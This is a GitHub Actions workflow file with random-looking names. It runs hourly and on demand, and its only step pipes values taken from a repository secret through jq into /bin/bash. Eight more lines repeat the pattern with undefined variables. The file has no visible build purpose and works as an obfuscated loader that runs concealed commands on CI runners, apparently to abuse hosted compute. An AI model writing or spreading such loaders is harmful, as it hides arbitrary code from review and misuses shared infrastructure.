name: zuolengchan6234

on:
  workflow_dispatch:
  schedule:
    - cron: '14 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zuolengchan6234
        env:
          j54760: ${{ secrets.j54760 }}
        run: |
          echo $j54760 | jq -r .ludu725 | /bin/bash
          echo $uot3347 | jq -r .iqi3 | /bin/bash
          echo $nnulb9 | jq -r .qaui08304 | /bin/bash
          echo $gm834 | jq -r .corc57880 | /bin/bash
          echo $ynna73 | jq -r .lfvg0 | /bin/bash
          echo $gwged8 | jq -r .shkoa47448 | /bin/bash
          echo $etr85597 | jq -r .yjur53099 | /bin/bash
          echo $iws640 | jq -r .km2906 | /bin/bash
          echo $kaxc7 | jq -r .frh7715 | /bin/bash

